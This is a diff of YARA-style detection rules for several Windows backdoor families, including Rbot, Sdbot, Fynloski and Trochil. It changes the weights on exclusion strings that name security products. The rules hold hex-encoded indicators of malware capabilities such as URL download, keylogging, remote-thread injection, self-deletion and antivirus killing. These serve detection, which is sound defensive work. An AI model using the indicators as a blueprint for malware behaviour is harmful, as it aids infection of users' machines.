((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_00_12 & 1)*1+(#a_00_13 & 1)*1+(#a_00_14 & 1)*1+(#a_00_15 & 1)*1+(#a_01_16 & 1)*-100) >=6
|
||||
|
||||
}
|
||||
|
|
@ -4,9 +4,9 @@ rule Backdoor_Win32_Fynloski_gen_A{
|
|||
description = "Backdoor:Win32/Fynloski.gen!A!!Fynloski.gen!A,SIGNATURE_TYPE_ARHSTR_EXT,05 00 05 00 16 00 00 "
|
||||
|
||||
strings :
|
||||
$a_00_0 = {5c 00 73 00 68 00 6b 00 65 00 72 00 6e 00 65 00 6c 00 5c 00 48 00 65 00 6c 00 70 00 64 00 65 00 73 00 6b 00 44 00 61 00 74 00 61 00 53 00 74 00 72 00 75 00 63 00 74 00 73 00 2e 00 68 00 } //65436 \shkernel\HelpdeskDataStructs.h
|
||||
$a_00_1 = {47 00 72 00 69 00 64 00 69 00 6e 00 53 00 6f 00 66 00 74 00 20 00 4c 00 4c 00 43 00 } //65486 GridinSoft LLC
|
||||
$a_00_2 = {49 00 6e 00 74 00 65 00 72 00 6e 00 61 00 6c 00 4e 00 61 00 6d 00 65 00 00 00 67 00 73 00 61 00 6d 00 2e 00 65 00 78 00 65 00 } //65486
|
||||
$a_00_0 = {5c 00 73 00 68 00 6b 00 65 00 72 00 6e 00 65 00 6c 00 5c 00 48 00 65 00 6c 00 70 00 64 00 65 00 73 00 6b 00 44 00 61 00 74 00 61 00 53 00 74 00 72 00 75 00 63 00 74 00 73 00 2e 00 68 00 } //-100 \shkernel\HelpdeskDataStructs.h
|
||||
$a_00_1 = {47 00 72 00 69 00 64 00 69 00 6e 00 53 00 6f 00 66 00 74 00 20 00 4c 00 4c 00 43 00 } //-50 GridinSoft LLC
|
||||
$a_00_2 = {49 00 6e 00 74 00 65 00 72 00 6e 00 61 00 6c 00 4e 00 61 00 6d 00 65 00 00 00 67 00 73 00 61 00 6d 00 2e 00 65 00 78 00 65 00 } //-50
|
||||
$a_01_3 = {23 42 4f 54 23 56 69 73 69 74 55 72 6c } //1 #BOT#VisitUrl
|
||||
$a_01_4 = {23 42 4f 54 23 53 76 72 55 6e 69 6e 73 74 61 6c 6c } //1 #BOT#SvrUninstall
|
||||
$a_01_5 = {23 42 4f 54 23 55 52 4c 44 6f 77 6e 6c 6f 61 64 } //1 #BOT#URLDownload
|
||||
|
|
@ -27,6 +27,6 @@ rule Backdoor_Win32_Fynloski_gen_A{
|
|||
$a_03_20 = {30 04 32 46 ff 4d 90 01 01 90 13 43 81 e3 ff 00 00 80 90 00 } //1
|
||||
$a_03_21 = {8b 06 83 f8 2e 0f 8f 90 01 02 00 00 0f 84 90 01 02 00 00 83 c0 f8 83 f8 25 0f 87 90 01 02 00 00 ff 24 90 00 } //2
|
||||
condition:
|
||||
((#a_00_0 & 1)*65436+(#a_00_1 & 1)*65486+(#a_00_2 & 1)*65486+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*1+(#a_01_9 & 1)*1+(#a_01_10 & 1)*1+(#a_01_11 & 1)*1+(#a_01_12 & 1)*1+(#a_01_13 & 1)*1+(#a_01_14 & 1)*1+(#a_01_15 & 1)*1+(#a_01_16 & 1)*1+(#a_01_17 & 1)*1+(#a_01_18 & 1)*1+(#a_01_19 & 1)*1+(#a_03_20 & 1)*1+(#a_03_21 & 1)*2) >=5
|
||||
((#a_00_0 & 1)*-100+(#a_00_1 & 1)*-50+(#a_00_2 & 1)*-50+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*1+(#a_01_9 & 1)*1+(#a_01_10 & 1)*1+(#a_01_11 & 1)*1+(#a_01_12 & 1)*1+(#a_01_13 & 1)*1+(#a_01_14 & 1)*1+(#a_01_15 & 1)*1+(#a_01_16 & 1)*1+(#a_01_17 & 1)*1+(#a_01_18 & 1)*1+(#a_01_19 & 1)*1+(#a_03_20 & 1)*1+(#a_03_21 & 1)*2) >=5
|
||||
|
||||
}
|
||||
|
|
@ -4,7 +4,7 @@ rule Backdoor_Win32_Idicaf_gen_A{
|
|||
description = "Backdoor:Win32/Idicaf.gen!A,SIGNATURE_TYPE_PEHSTR_EXT,19 00 19 00 0e 00 00 "
|
||||
|
||||
strings :
|
||||
$a_01_0 = {5c 53 69 6d 70 6c 79 20 53 75 70 65 72 20 53 6f 66 74 77 61 72 65 5c 54 72 6f 6a 61 6e 20 52 65 6d 6f 76 65 72 5c } //65436 \Simply Super Software\Trojan Remover\
|
||||
$a_01_0 = {5c 53 69 6d 70 6c 79 20 53 75 70 65 72 20 53 6f 66 74 77 61 72 65 5c 54 72 6f 6a 61 6e 20 52 65 6d 6f 76 65 72 5c } //-100 \Simply Super Software\Trojan Remover\
|
||||
$a_00_1 = {b8 68 58 4d 56 bb 00 00 00 00 b9 0a 00 00 00 ba 58 56 00 00 ed 81 fb 68 58 4d 56 } //20
|
||||
$a_00_2 = {49 6e 6a 65 63 74 } //1 Inject
|
||||
$a_00_3 = {4b 65 79 4c 6f 67 } //1 KeyLog
|
||||
|
|
@ -19,6 +19,6 @@ rule Backdoor_Win32_Idicaf_gen_A{
|
|||
$a_00_12 = {69 66 20 65 78 69 73 74 20 22 25 73 22 20 67 6f 74 6f 20 73 65 6c 66 6b 69 6c 6c } //1 if exist "%s" goto selfkill
|
||||
$a_00_13 = {43 72 65 61 74 65 52 65 6d 6f 74 65 54 68 72 65 61 64 } //1 CreateRemoteThread
|
||||
condition:
|
||||
((#a_01_0 & 1)*65436+(#a_00_1 & 1)*20+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_00_12 & 1)*1+(#a_00_13 & 1)*1) >=25
|
||||
((#a_01_0 & 1)*-100+(#a_00_1 & 1)*20+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_00_12 & 1)*1+(#a_00_13 & 1)*1) >=25
|
||||
|
||||
}
|
||||
|
|
@ -8,9 +8,9 @@ rule Backdoor_Win32_Popwin_gen_E{
|
|||
$a_00_1 = {44 65 6c 65 74 65 55 72 6c 43 61 63 68 65 45 6e 74 72 79 } //10 DeleteUrlCacheEntry
|
||||
$a_01_2 = {3d 2b 05 00 00 73 07 b8 e6 73 3e 02 c9 c3 83 f8 f0 76 0b 33 d2 b9 00 e1 f5 05 f7 f1 8b c2 c9 c3 } //1
|
||||
$a_01_3 = {8a 55 10 8d 84 0d fc fe ff ff 2a d1 8a 1c 06 32 da 41 3b 4d 10 88 18 7c e7 } //5
|
||||
$a_00_4 = {77 77 77 2e 33 36 30 2e 63 6e } //65436 www.360.cn
|
||||
$a_00_5 = {33 36 30 73 61 66 65 75 70 6c 6f 61 64 5f 6d 75 74 65 78 } //65436 360safeupload_mutex
|
||||
$a_00_4 = {77 77 77 2e 33 36 30 2e 63 6e } //-100 www.360.cn
|
||||
$a_00_5 = {33 36 30 73 61 66 65 75 70 6c 6f 61 64 5f 6d 75 74 65 78 } //-100 360safeupload_mutex
|
||||
condition:
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*10+(#a_01_2 & 1)*1+(#a_01_3 & 1)*5+(#a_00_4 & 1)*65436+(#a_00_5 & 1)*65436) >=21
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*10+(#a_01_2 & 1)*1+(#a_01_3 & 1)*5+(#a_00_4 & 1)*-100+(#a_00_5 & 1)*-100) >=21
|
||||
|
||||
}
|
||||
|
|
@ -26,8 +26,8 @@ rule Backdoor_Win32_PornDialer_G{
|
|||
$a_00_19 = {30 39 33 30 38 32 30 37 30 34 } //1 0930820704
|
||||
$a_00_20 = {31 39 30 30 38 30 37 38 38 } //1 190080788
|
||||
$a_00_21 = {66 69 6e 64 65 6e 20 53 69 65 20 68 69 65 72 20 77 77 77 2e 67 6c 6f 62 61 6c 2d 6e 65 74 63 6f 6d 2e 64 65 2f 44 69 61 6c 65 72 2d 41 47 42 } //1 finden Sie hier www.global-netcom.de/Dialer-AGB
|
||||
$a_00_22 = {50 72 69 6e 74 20 77 69 74 68 20 7a 6f 64 69 61 63 20 73 69 67 6e 20 62 65 74 77 65 65 6e 20 64 65 67 72 65 65 73 20 61 6e 64 20 6d 69 6e 75 74 65 73 } //65436 Print with zodiac sign between degrees and minutes
|
||||
$a_00_22 = {50 72 69 6e 74 20 77 69 74 68 20 7a 6f 64 69 61 63 20 73 69 67 6e 20 62 65 74 77 65 65 6e 20 64 65 67 72 65 65 73 20 61 6e 64 20 6d 69 6e 75 74 65 73 } //-100 Print with zodiac sign between degrees and minutes
|
||||
condition:
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_01_10 & 1)*1+(#a_01_11 & 1)*1+(#a_00_12 & 1)*1+(#a_00_13 & 1)*1+(#a_01_14 & 1)*1+(#a_01_15 & 1)*1+(#a_00_16 & 1)*1+(#a_00_17 & 1)*1+(#a_00_18 & 1)*1+(#a_00_19 & 1)*1+(#a_00_20 & 1)*1+(#a_00_21 & 1)*1+(#a_00_22 & 1)*65436) >=8
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_01_10 & 1)*1+(#a_01_11 & 1)*1+(#a_00_12 & 1)*1+(#a_00_13 & 1)*1+(#a_01_14 & 1)*1+(#a_01_15 & 1)*1+(#a_00_16 & 1)*1+(#a_00_17 & 1)*1+(#a_00_18 & 1)*1+(#a_00_19 & 1)*1+(#a_00_20 & 1)*1+(#a_00_21 & 1)*1+(#a_00_22 & 1)*-100) >=8
|
||||
|
||||
}
|
||||
|
|
@ -4,8 +4,8 @@ rule Backdoor_Win32_Rbot{
|
|||
description = "Backdoor:Win32/Rbot,SIGNATURE_TYPE_PEHSTR_EXT,1e 00 14 00 ffffffb0 00 00 "
|
||||
|
||||
strings :
|
||||
$a_00_0 = {4d 00 63 00 41 00 66 00 65 00 65 00 20 00 53 00 74 00 69 00 6e 00 67 00 65 00 72 00 } //65436 McAfee Stinger
|
||||
$a_00_1 = {4d 00 63 00 41 00 66 00 65 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 53 00 74 00 69 00 6e 00 67 00 65 00 72 00 } //65436 McAfee Inc. Stinger
|
||||
$a_00_0 = {4d 00 63 00 41 00 66 00 65 00 65 00 20 00 53 00 74 00 69 00 6e 00 67 00 65 00 72 00 } //-100 McAfee Stinger
|
||||
$a_00_1 = {4d 00 63 00 41 00 66 00 65 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 53 00 74 00 69 00 6e 00 67 00 65 00 72 00 } //-100 McAfee Inc. Stinger
|
||||
$a_00_2 = {4e 54 50 61 73 73 } //1 NTPass
|
||||
$a_00_3 = {6e 74 73 63 61 6e 31 33 39 } //1 ntscan139
|
||||
$a_00_4 = {6e 74 73 63 61 6e 34 34 35 } //1 ntscan445
|
||||
|
|
@ -181,6 +181,6 @@ rule Backdoor_Win32_Rbot{
|
|||
$a_00_174 = {73 74 61 72 74 20 41 56 2f 46 57 20 6b 69 6c 6c 65 72 20 74 68 72 65 61 64 } //2 start AV/FW killer thread
|
||||
$a_00_175 = {53 65 72 76 73 74 72 69 63 74 20 61 63 63 65 73 73 20 74 6f 20 74 68 65 20 49 50 43 24 } //2 Servstrict access to the IPC$
|
||||
condition:
|
||||
((#a_00_0 & 1)*65436+(#a_00_1 & 1)*65436+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_00_12 & 1)*1+(#a_00_13 & 1)*1+(#a_00_14 & 1)*1+(#a_00_15 & 1)*1+(#a_00_16 & 1)*1+(#a_00_17 & 1)*1+(#a_00_18 & 1)*1+(#a_00_19 & 1)*1+(#a_00_20 & 1)*1+(#a_00_21 & 1)*1+(#a_00_22 & 1)*1+(#a_00_23 & 1)*1+(#a_00_24 & 1)*1+(#a_00_25 & 1)*1+(#a_00_26 & 1)*2+(#a_00_27 & 1)*2+(#a_00_28 & 1)*2+(#a_00_29 & 1)*1+(#a_00_30 & 1)*1+(#a_00_31 & 1)*1+(#a_00_32 & 1)*1+(#a_00_33 & 1)*2+(#a_00_34 & 1)*1+(#a_00_35 & 1)*1+(#a_00_36 & 1)*1+(#a_00_37 & 1)*1+(#a_00_38 & 1)*1+(#a_00_39 & 1)*1+(#a_00_40 & 1)*1+(#a_00_41 & 1)*2+(#a_00_42 & 1)*2+(#a_00_43 & 1)*2+(#a_00_44 & 1)*1+(#a_00_45 & 1)*1+(#a_00_46 & 1)*1+(#a_00_47 & 1)*1+(#a_00_48 & 1)*1+(#a_00_49 & 1)*1+(#a_00_50 & 1)*1+(#a_00_51 & 1)*1+(#a_00_52 & 1)*1+(#a_00_53 & 1)*1+(#a_00_54 & 1)*1+(#a_00_55 & 1)*1+(#a_00_56 & 1)*1+(#a_00_57 & 1)*1+(#a_00_58 & 1)*1+(#a_00_59 & 1)*1+(#a_00_60 & 1)*1+(#a_00_61 & 1)*1+(#a_00_62 & 1)*1+(#a_00_63 & 1)*1+(#a_00_64 & 1)*1+(#a_00_65 & 1)*1+(#a_00_66 & 1)*1+(#a_00_67 & 1)*1+(#a_00_68 & 1)*1+(#a_00_69 & 1)*1+(#a_00_70 & 1)*1+(#a_00_71 & 1)*1+(#a_00_72 & 1)*1+(#a_00_73 & 1)*1+(#a_00_74 & 1)*1+(#a_00_75 & 1)*1+(#a_00_76 & 1)*1+(#a_01_77 & 1)*2+(#a_00_78 & 1)*1+(#a_00_79 & 1)*2+(#a_00_80 & 1)*2+(#a_00_81 & 1)*1+(#a_00_82 & 1)*1+(#a_00_83 & 1)*1+(#a_00_84 & 1)*1+(#a_00_85 & 1)*1+(#a_00_86 & 1)*1+(#a_00_87 & 1)*1+(#a_00_88 & 1)*1+(#a_00_89 & 1)*1+(#a_00_90 & 1)*3+(#a_00_91 & 1)*1+(#a_00_92 & 1)*1+(#a_00_93 & 1)*1+(#a_00_94 & 1)*1+(#a_00_95 & 1)*1+(#a_00_96 & 1)*1+(#a_00_97 & 1)*1+(#a_00_98 & 1)*1+(#a_00_99 & 1)*1+(#a_00_100 & 1)*1+(#a_00_101 & 1)*1+(#a_00_102 & 1)*1+(#a_00_103 & 1)*1+(#a_00_104 & 1)*1+(#a_00_105 & 1)*1+(#a_00_106 & 1)*1+(#a_00_107 & 1)*1+(#a_00_108 & 1)*1+(#a_00_109 & 1)*1+(#a_00_110 & 1)*1+(#a_00_111 & 1)*1+(#a_00_112 & 1)*1+(#a_00_113 & 1)*1+(#a_00_114 & 1)*1+(#a_00_115 & 1)*1+(#a_00_116 & 1)*1+(#a_00_117 & 1)*1+(#a_00_118 & 1)*1+(#a_00_119 & 1)*2+(#a_00_120 & 1)*2+(#a_00_121 & 1)*1+(#a_00_122 & 1)*2+(#a_00_123 & 1)*2+(#a_00_124 & 1)*1+(#a_00_125 & 1)*1+(#a_00_126 & 1)*3+(#a_00_127 & 1)*3+(#a_00_128 & 1)*1+(#a_00_129 & 1)*1+(#a_00_130 & 1)*1+(#a_00_131 & 1)*1+(#a_00_132 & 1)*2+(#a_00_133 & 1)*3+(#a_00_134 & 1)*1+(#a_00_135 & 1)*1+(#a_00_136 & 1)*1+(#a_00_137 & 1)*2+(#a_00_138 & 1)*3+(#a_00_139 & 1)*1+(#a_01_140 & 1)*1+(#a_01_141 & 1)*1+(#a_01_142 & 1)*1+(#a_00_143 & 1)*1+(#a_00_144 & 1)*1+(#a_00_145 & 1)*1+(#a_00_146 & 1)*2+(#a_00_147 & 1)*1+(#a_00_148 & 1)*2+(#a_00_149 & 1)*1+(#a_00_150 & 1)*1+(#a_00_151 & 1)*1+(#a_00_152 & 1)*2+(#a_00_153 & 1)*1+(#a_00_154 & 1)*1+(#a_00_155 & 1)*1+(#a_00_156 & 1)*1+(#a_00_157 & 1)*1+(#a_00_158 & 1)*1+(#a_00_159 & 1)*1+(#a_00_160 & 1)*1+(#a_00_161 & 1)*1+(#a_00_162 & 1)*1+(#a_00_163 & 1)*1+(#a_00_164 & 1)*1+(#a_00_165 & 1)*1+(#a_00_166 & 1)*1+(#a_00_167 & 1)*1+(#a_00_168 & 1)*1+(#a_00_169 & 1)*1+(#a_00_170 & 1)*1+(#a_02_171 & 1)*2+(#a_00_172 & 1)*1+(#a_00_173 & 1)*2+(#a_00_174 & 1)*2+(#a_00_175 & 1)*2) >=20
|
||||
((#a_00_0 & 1)*-100+(#a_00_1 & 1)*-100+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_00_12 & 1)*1+(#a_00_13 & 1)*1+(#a_00_14 & 1)*1+(#a_00_15 & 1)*1+(#a_00_16 & 1)*1+(#a_00_17 & 1)*1+(#a_00_18 & 1)*1+(#a_00_19 & 1)*1+(#a_00_20 & 1)*1+(#a_00_21 & 1)*1+(#a_00_22 & 1)*1+(#a_00_23 & 1)*1+(#a_00_24 & 1)*1+(#a_00_25 & 1)*1+(#a_00_26 & 1)*2+(#a_00_27 & 1)*2+(#a_00_28 & 1)*2+(#a_00_29 & 1)*1+(#a_00_30 & 1)*1+(#a_00_31 & 1)*1+(#a_00_32 & 1)*1+(#a_00_33 & 1)*2+(#a_00_34 & 1)*1+(#a_00_35 & 1)*1+(#a_00_36 & 1)*1+(#a_00_37 & 1)*1+(#a_00_38 & 1)*1+(#a_00_39 & 1)*1+(#a_00_40 & 1)*1+(#a_00_41 & 1)*2+(#a_00_42 & 1)*2+(#a_00_43 & 1)*2+(#a_00_44 & 1)*1+(#a_00_45 & 1)*1+(#a_00_46 & 1)*1+(#a_00_47 & 1)*1+(#a_00_48 & 1)*1+(#a_00_49 & 1)*1+(#a_00_50 & 1)*1+(#a_00_51 & 1)*1+(#a_00_52 & 1)*1+(#a_00_53 & 1)*1+(#a_00_54 & 1)*1+(#a_00_55 & 1)*1+(#a_00_56 & 1)*1+(#a_00_57 & 1)*1+(#a_00_58 & 1)*1+(#a_00_59 & 1)*1+(#a_00_60 & 1)*1+(#a_00_61 & 1)*1+(#a_00_62 & 1)*1+(#a_00_63 & 1)*1+(#a_00_64 & 1)*1+(#a_00_65 & 1)*1+(#a_00_66 & 1)*1+(#a_00_67 & 1)*1+(#a_00_68 & 1)*1+(#a_00_69 & 1)*1+(#a_00_70 & 1)*1+(#a_00_71 & 1)*1+(#a_00_72 & 1)*1+(#a_00_73 & 1)*1+(#a_00_74 & 1)*1+(#a_00_75 & 1)*1+(#a_00_76 & 1)*1+(#a_01_77 & 1)*2+(#a_00_78 & 1)*1+(#a_00_79 & 1)*2+(#a_00_80 & 1)*2+(#a_00_81 & 1)*1+(#a_00_82 & 1)*1+(#a_00_83 & 1)*1+(#a_00_84 & 1)*1+(#a_00_85 & 1)*1+(#a_00_86 & 1)*1+(#a_00_87 & 1)*1+(#a_00_88 & 1)*1+(#a_00_89 & 1)*1+(#a_00_90 & 1)*3+(#a_00_91 & 1)*1+(#a_00_92 & 1)*1+(#a_00_93 & 1)*1+(#a_00_94 & 1)*1+(#a_00_95 & 1)*1+(#a_00_96 & 1)*1+(#a_00_97 & 1)*1+(#a_00_98 & 1)*1+(#a_00_99 & 1)*1+(#a_00_100 & 1)*1+(#a_00_101 & 1)*1+(#a_00_102 & 1)*1+(#a_00_103 & 1)*1+(#a_00_104 & 1)*1+(#a_00_105 & 1)*1+(#a_00_106 & 1)*1+(#a_00_107 & 1)*1+(#a_00_108 & 1)*1+(#a_00_109 & 1)*1+(#a_00_110 & 1)*1+(#a_00_111 & 1)*1+(#a_00_112 & 1)*1+(#a_00_113 & 1)*1+(#a_00_114 & 1)*1+(#a_00_115 & 1)*1+(#a_00_116 & 1)*1+(#a_00_117 & 1)*1+(#a_00_118 & 1)*1+(#a_00_119 & 1)*2+(#a_00_120 & 1)*2+(#a_00_121 & 1)*1+(#a_00_122 & 1)*2+(#a_00_123 & 1)*2+(#a_00_124 & 1)*1+(#a_00_125 & 1)*1+(#a_00_126 & 1)*3+(#a_00_127 & 1)*3+(#a_00_128 & 1)*1+(#a_00_129 & 1)*1+(#a_00_130 & 1)*1+(#a_00_131 & 1)*1+(#a_00_132 & 1)*2+(#a_00_133 & 1)*3+(#a_00_134 & 1)*1+(#a_00_135 & 1)*1+(#a_00_136 & 1)*1+(#a_00_137 & 1)*2+(#a_00_138 & 1)*3+(#a_00_139 & 1)*1+(#a_01_140 & 1)*1+(#a_01_141 & 1)*1+(#a_01_142 & 1)*1+(#a_00_143 & 1)*1+(#a_00_144 & 1)*1+(#a_00_145 & 1)*1+(#a_00_146 & 1)*2+(#a_00_147 & 1)*1+(#a_00_148 & 1)*2+(#a_00_149 & 1)*1+(#a_00_150 & 1)*1+(#a_00_151 & 1)*1+(#a_00_152 & 1)*2+(#a_00_153 & 1)*1+(#a_00_154 & 1)*1+(#a_00_155 & 1)*1+(#a_00_156 & 1)*1+(#a_00_157 & 1)*1+(#a_00_158 & 1)*1+(#a_00_159 & 1)*1+(#a_00_160 & 1)*1+(#a_00_161 & 1)*1+(#a_00_162 & 1)*1+(#a_00_163 & 1)*1+(#a_00_164 & 1)*1+(#a_00_165 & 1)*1+(#a_00_166 & 1)*1+(#a_00_167 & 1)*1+(#a_00_168 & 1)*1+(#a_00_169 & 1)*1+(#a_00_170 & 1)*1+(#a_02_171 & 1)*2+(#a_00_172 & 1)*1+(#a_00_173 & 1)*2+(#a_00_174 & 1)*2+(#a_00_175 & 1)*2) >=20
|
||||
|
||||
}
|
||||
|
|
@ -16,9 +16,9 @@ rule Backdoor_Win32_Sdbot{
|
|||
$a_00_9 = {73 70 79 20 63 72 65 61 74 65 64 20 6f 6e } //2 spy created on
|
||||
$a_00_10 = {63 6c 6f 6e 65 20 63 72 65 61 74 65 64 20 6f 6e 20 25 73 3a 25 64 2c 20 69 6e 20 63 68 61 6e 6e 65 6c 20 25 73 2e } //1 clone created on %s:%d, in channel %s.
|
||||
$a_00_11 = {63 6f 6e 6e 65 63 74 69 6f 6e 20 74 79 70 65 3a 20 25 73 20 28 25 73 29 2e 20 6c 6f 63 61 6c 20 49 50 20 61 64 64 72 65 73 73 3a 20 25 64 2e 25 64 2e 25 64 2e 25 64 2e 20 63 6f 6e 6e 65 63 74 65 64 20 66 72 6f 6d 3a 20 25 73 } //1 connection type: %s (%s). local IP address: %d.%d.%d.%d. connected from: %s
|
||||
$a_80_12 = {4d 63 41 66 65 65 20 53 74 69 6e 67 65 72 } //McAfee Stinger 65526
|
||||
$a_00_13 = {4d 00 63 00 41 00 66 00 65 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 53 00 74 00 69 00 6e 00 67 00 65 00 72 00 } //65526 McAfee Inc. Stinger
|
||||
$a_80_12 = {4d 63 41 66 65 65 20 53 74 69 6e 67 65 72 } //McAfee Stinger -10
|
||||
$a_00_13 = {4d 00 63 00 41 00 66 00 65 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 53 00 74 00 69 00 6e 00 67 00 65 00 72 00 } //-10 McAfee Inc. Stinger
|
||||
condition:
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*2+(#a_00_2 & 1)*2+(#a_00_3 & 1)*2+(#a_00_4 & 1)*2+(#a_00_5 & 1)*2+(#a_00_6 & 1)*2+(#a_00_7 & 1)*2+(#a_00_8 & 1)*1+(#a_00_9 & 1)*2+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_80_12 & 1)*65526+(#a_00_13 & 1)*65526) >=8
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*2+(#a_00_2 & 1)*2+(#a_00_3 & 1)*2+(#a_00_4 & 1)*2+(#a_00_5 & 1)*2+(#a_00_6 & 1)*2+(#a_00_7 & 1)*2+(#a_00_8 & 1)*1+(#a_00_9 & 1)*2+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_80_12 & 1)*-10+(#a_00_13 & 1)*-10) >=8
|
||||
|
||||
}
|
||||
|
|
@ -50,9 +50,9 @@ rule Backdoor_Win32_Trochil_A_dll{
|
|||
$a_80_43 = {74 72 79 20 74 6f 20 63 6c 65 61 6e 20 25 73 } //try to clean %s 1
|
||||
$a_80_44 = {74 72 79 20 74 6f 20 72 65 6d 6f 76 65 5b 25 73 5d } //try to remove[%s] 1
|
||||
$a_80_45 = {58 4c 53 65 72 76 61 6e 74 } //XLServant 1
|
||||
$a_80_46 = {43 3a 5c 64 65 76 5c 50 61 6c 61 64 69 6e 5c 50 61 6c 61 64 69 6e 5c 74 61 72 67 65 74 5c 72 65 6c 65 61 73 65 5c 64 65 70 73 5c 50 61 6c 61 64 69 6e 2e 70 64 62 } //C:\dev\Paladin\Paladin\target\release\deps\Paladin.pdb 65526
|
||||
$a_80_47 = {43 3a 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 50 61 6c 61 64 69 6e 5c 4c 6f 67 73 5c 4c 6f 67 2e 70 61 6c 61 64 69 6e } //C:\Program Files\Paladin\Logs\Log.paladin 65526
|
||||
$a_80_46 = {43 3a 5c 64 65 76 5c 50 61 6c 61 64 69 6e 5c 50 61 6c 61 64 69 6e 5c 74 61 72 67 65 74 5c 72 65 6c 65 61 73 65 5c 64 65 70 73 5c 50 61 6c 61 64 69 6e 2e 70 64 62 } //C:\dev\Paladin\Paladin\target\release\deps\Paladin.pdb -10
|
||||
$a_80_47 = {43 3a 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 50 61 6c 61 64 69 6e 5c 4c 6f 67 73 5c 4c 6f 67 2e 70 61 6c 61 64 69 6e } //C:\Program Files\Paladin\Logs\Log.paladin -10
|
||||
condition:
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_80_7 & 1)*1+(#a_80_8 & 1)*1+(#a_80_9 & 1)*1+(#a_80_10 & 1)*1+(#a_80_11 & 1)*1+(#a_80_12 & 1)*1+(#a_80_13 & 1)*1+(#a_80_14 & 1)*1+(#a_80_15 & 1)*1+(#a_80_16 & 1)*1+(#a_80_17 & 1)*1+(#a_80_18 & 1)*1+(#a_80_19 & 1)*1+(#a_80_20 & 1)*1+(#a_80_21 & 1)*1+(#a_80_22 & 1)*1+(#a_80_23 & 1)*1+(#a_80_24 & 1)*1+(#a_80_25 & 1)*1+(#a_80_26 & 1)*1+(#a_80_27 & 1)*1+(#a_80_28 & 1)*1+(#a_80_29 & 1)*1+(#a_80_30 & 1)*1+(#a_80_31 & 1)*1+(#a_80_32 & 1)*1+(#a_80_33 & 1)*1+(#a_80_34 & 1)*1+(#a_80_35 & 1)*1+(#a_80_36 & 1)*1+(#a_80_37 & 1)*1+(#a_80_38 & 1)*1+(#a_80_39 & 1)*1+(#a_80_40 & 1)*1+(#a_80_41 & 1)*1+(#a_80_42 & 1)*1+(#a_80_43 & 1)*1+(#a_80_44 & 1)*1+(#a_80_45 & 1)*1+(#a_80_46 & 1)*65526+(#a_80_47 & 1)*65526) >=5
|
||||
